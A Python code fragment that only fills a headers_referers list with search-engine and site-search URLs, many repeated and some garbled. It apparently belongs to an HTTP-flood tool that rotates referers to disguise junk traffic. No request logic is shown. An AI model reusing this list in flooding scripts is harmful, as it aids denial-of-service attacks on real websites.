headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..')
headers_referers.append('http://vk.com/profile.php?redirect=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=query?=query=..')
headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://go.mail.ru/search?mail.ru=1&q=')
headers_referers.append('http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..')
headers_referers.append('http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..')
headers_referers.append('http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..')
headers_referers.append('http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..')
headers_referers.append('http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..')
headers_referers.append('http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..')
headers_referers.append('http://www.google.ru/url?sa=t&rct=?j&q=&e..')
headers_referers.append('http://help.baidu.com/searchResult?keywords=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('https://www.yandex.com/yandsearch?text=')
headers_referers.append('https://duckduckgo.com/?q=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.aol.com/aol/search?q=')
headers_referers.append('https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=')
headers_referers.append('https://drive.google.com/viewerng/viewer?url=')
headers_referers.append('http://validator.w3.org/feed/check.cgi?url=')
headers_referers.append('http://host-tracker.com/check_page/?furl=')
headers_referers.append('http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=')
headers_referers.append('http://jigsaw.w3.org/css-validator/validator?uri=')
headers_referers.append('https://add.my.yahoo.com/rss?url=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('https://steamcommunity.com/market/search?q=')
headers_referers.append('http://filehippo.com/search?q=')
headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=')
headers_referers.append('http://eu.battle.net/wow/en/search?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://careers.gatesfoundation.org/search?q=')
headers_referers.append('http://techtv.mit.edu/search?q=')
headers_referers.append('http://www.ustream.tv/search?q=')
headers_referers.append('http://www.ted.com/search?q=')
headers_referers.append('http://funnymama.com/search?q=')
headers_referers.append('http://itch.io/search?q=')
headers_referers.append('http://jobs.rbs.com/jobs/search?q=')
headers_referers.append('http://taginfo.openstreetmap.org/search?q=')
headers_referers.append('http://www.baoxaydung.com.vn/news/vn/search&q=')
headers_referers.append('https://play.google.com/store/search?q=')
headers_referers.append('http://www.tceq.texas.gov/@@tceq-search?q=')
headers_referers.append('http://www.reddit.com/search?q=')
headers_referers.append('http://www.bestbuytheater.com/events/search?q=')
headers_referers.append('https://careers.carolinashealthcare.org/search?q=')
headers_referers.append('http://jobs.leidos.com/search?q=')
headers_referers.append('http://jobs.bloomberg.com/search?q=')
headers_referers.append('https://www.pinterest.com/search/?q=')
headers_referers.append('http://millercenter.org/search?q=')
headers_referers.append('https://www.npmjs.com/search?q=')
headers_referers.append('http://www.evidence.nhs.uk/search?q=')
headers_referers.append('http://www.shodanhq.com/search?q=')
headers_referers.append('http://ytmnd.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('https://steamcommunity.com/market/search?q=')
headers_referers.append('http://filehippo.com/search?q=')
headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=')
headers_referers.append('http://eu.battle.net/wow/en/search?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://careers.gatesfoundation.org/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
